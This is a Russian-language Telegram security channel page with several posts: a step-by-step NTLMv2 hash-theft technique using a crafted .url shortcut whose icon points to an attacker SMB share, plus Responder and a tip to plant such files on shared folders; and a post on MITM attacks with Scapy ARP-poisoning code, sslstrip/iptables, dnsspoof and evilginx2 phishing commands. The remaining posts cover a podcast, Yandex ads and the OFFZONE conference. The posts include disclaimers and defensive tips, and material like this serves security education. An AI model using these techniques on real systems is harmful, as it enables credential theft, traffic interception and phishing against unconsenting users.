RedBlue Notes
504 subscribers
190 photos
10 videos
6 files
137 links
Мы делимся секретами атак и методами защиты, даем практические советы. Если вы хотите узнать, как защищать свои системы от угроз или понять логику злоумышленников, присоединяйтесь к нам! Здесь каждый найдет что-то полезное, независимо от стороны баррикад!
Download Telegram
Хотите подкаст на следующей неделе?
Anonymous Poll
96%
Да 🟢
4%
Нет 🔴
Каждый кто увидит - окаменеет отдаст свой пароль

Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.


Доброе утро! Сегодня расскажу о одном простом способе воровства NTLMv2 хэшей

1. Подготовка. Создаём интернет ярлык (.url), кстати, на такой файл НЕ будут жаловаться антивирусы 🙈
[InternetShortcut] 
URL=RedBlue
WorkingDirectory=notes
IconFile=\\172.16.71.71\%USERNAME%.icon
IconIndex=1


2. Запускаем responder, что бы принимать хэши
sudo responder -I eth0


3. Подкидываем жертве файл и рыбачим 🎣 Ждём, когда кто-то откроет папку с нашим файлом

4. БИНГО! Хэш у нас 💃 Дальше можно брутить, но это уже другая история

Хинт для красных👽:
Можете прятать такие файлы на общедоступных шарах, ловить хэши и горизонтально перемещаться


Хинт для синих
👽:
Периодически проводите аудиты того, что лежит в шарах, а то вдруг кто-то положит .url или, может кто-то хранит password.txt 🤣


Подписывайтесь на канал, дальше больше!
Please open Telegram to view this post
VIEW IN TELEGRAM
14🤯31
Audio
Ого, 4-ый выпуск так быстро! Спасибо, что вы нас слушаете, мотивируете!
Сегодня промежуточный выпуск: захотели поговорить про IoT и другие «умные штуки». Как они влияют на нашу жизнь, чем могут реально напугать и почему иногда тостер или зубная щётка звучат страшнее, чем хакер с ноутбуком. Потравили пару баек, ну и как обычно рассказали лучшие способы решения проблем!

Кроме того, нас просят, чтобы подкаст выходил на Яндекс.Музыке, но при всём уважении к подписчикам и неуважении к компании на последнюю букву алфавита, на этой площадке мы не будем появляться. На то есть причины (когда-нибудь о них расскажет один из авторов, но не сейчас — интрига???).
Мы подумаем, где ещё можно будет залиститься.
А ещё мы экспериментируем со звуком и ищем лучшее звучание — так что каждая новая запись для нас тоже немного тест.

Кстати, мы теперь:

🟢Spotify
🟣Apple Music
🔴YouTube
🔵Web
🟡Index

Так что слушать стало ещё удобнее.

Если нравится то, что мы делаем — ставьте лайки и подписывайтесь, так вы помогаете подкасту расти.
Please open Telegram to view this post
VIEW IN TELEGRAM
14
Forwarded from PRO:PENTEST
Разведка_для_физического_пентеста.drawio
49.9 MB
А вот и редактируемая карта для вашего удобства. Делитесь, пользуйтесь, комментируйте🔥
4👏22
MITM олдскул из нулевых?!

Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.
Man-in-the-Middle (MITM) атаки из заумной теории превратились в доступный для любого энтузиаста инструмент. Это был настоящий «дикий запад» сетевой безопасности, где арсенал хакера часто ограничивался лишь знанием протоколов и парой скриптов в Kali Linux. Давайте посмотрим к чему пришли хакеры и что стало популярным в их арсенале.


АРП-призрак 🔫
Один из самых популярных способов MITM-атаки в локальных сетях. Злоумышленник отправляет ложные ARP-ответы, заставляя устройства в сети связываться с ним вместо настоящего шлюза. Это позволяет перехватывать и изменять трафик между устройствами.
Инструменты: arpspoof (Kali Linux), Scapy (Python)
Пример: Использование Scapy для создания ARP-спуфинга:
  from scapy.all import *

def arp_poison(target_ip, gateway_ip):
target_mac = getmacbyip(target_ip)
gateway_mac = getmacbyip(gateway_ip)
arp_target = ARP(op=2, pdst=target_ip, psrc=gateway_ip, hwdst=target_mac)
arp_gateway = ARP(op=2, pdst=gateway_ip, psrc=target_ip, hwdst=gateway_mac)
send(arp_target)
send(arp_gateway)


Лишаем трафик защиты одним движением руки 🧘‍♀️
Атака, при которой злоумышленник перехватывает HTTPS-соединение и перенаправляет его на HTTP, удаляя SSL/TLS-шифрование. Это позволяет читать и изменять передаваемые данные.
Инструменты: sslstrip, mitmproxy
Пример: Запуск sslstrip с использованием iptables для перенаправления трафика:
  iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
sslstrip -l 10000


Подменяем дорожные знаки 💃
Атака, при которой злоумышленник подменяет записи DNS-сервера, перенаправляя трафик на фальшивые сайты. Это может привести к фишинговым атакам или распространению вредоносного ПО.
Инструменты: dnsspoof (Kali Linux), mitmproxy
Пример: Использование dnsspoof для подмены DNS-записей:
 dnsspoof -i eth0 -f hosts.txt


Цифровой троянский конь 👀
Атака, при которой вредоносное ПО в браузере изменяет содержимое веб-страниц или перехватывает вводимые данные, такие как логины и пароли.
Инструменты: BeEF (Browser Exploitation Framework), Evilginx2
Пример: Использование Evilginx2 для фишинга с перехватом сессий:
  evilginx2 -p phishlets/office365


Заключение 🍩
Как видите, олдскульные MITM-атаки из нулевых, несмотря на свой возраст, блестяще демонстрируют фундаментальные уязвимости в самих принципах работы сетей. Эти техники не канули в Лету — они эволюционировали, стали частью сложных многоуровневых атак и инструментария пентестеров. Знание этой классики — не призыв к анархии, а лучший способ понять логику защиты. Современные методы вроде строгого HTTPS (HSTS), DNSSEC, аппаратной аутентификации ARP и защиты на уровне браузера рождены именно как ответ на эти простые, но гениальные атаки.

Подписывайтесь на канал, дальше больше!
Please open Telegram to view this post
VIEW IN TELEGRAM
311
RedBlue Notes pinned an audio file
Блин, ребята, крик души одного из админов. Пользоваться сервисами Яндекса становится просто невыносимо: невозможно вызвать такси без рекламы, невозможно что-то найти без рекламы. Скажите, вы считаете такое поведение монополиста на рынке ИТ-технологий адекватным?

Многие компании грешат рекламой своих продуктов, но тут почти в каждом продукте Яндекса либо реклама самих себя, либо просто реклама. В каждом Telegram-паблике — реклама Яндекса. Один из админов даже отказался от всех сервисов компании, кроме такси — потому что, увы, выбора просто нет. Разочаровывает то, что вместо того чтобы создавать действительно качественные продукты (постоянно падающие облака, проблемная сетевая инфраструктура), они вставляют рекламу буквально везде, где есть свободное место. И особенно забавно, что у админа подписка «Плюс»… Интересно, без неё рекламы ещё больше?

Невозможно вызвать такси без надоедливой плашки, а вы видели цены на абрикосы в их лавке — 100 рублей? Начинает это конкретно раздражать.

Вызывал такси, всплыла реклама на весь экран раза 2, просто ужас...

P.S.
Понимаю реклама есть везде, но обычно это фиксится тем, что ты платишь за ее отсутствие 🙂

И это даже не та причина, почему не нравится компания на букву "Я".
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍7
RedBlue Notes на OFFZONE 2025!!

Хоть сегодня только первый день конференции, но я уже получил море положительных эмоций. Послушал доклад легендарного Евгения, спаял себе новый аддон и ещё 1 получил за квест, пополнил свою ИБ библиотеку ресёчем.

В моей коллекции +-10 аддонов, что по меркам конфы много. Но я встретил того, кто собрал ЁЛЕУ из кучи аддонов. Просто вау 🔝
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
54🤯2
Forwarded from assume birch
Сегодня весь день выступаем на OFFZONE

Приходите на Community.Track, за лучшие вопросы подарим наш мерч.

Можно получить худи с патчами, футболку с нашим лого или ежедневник
63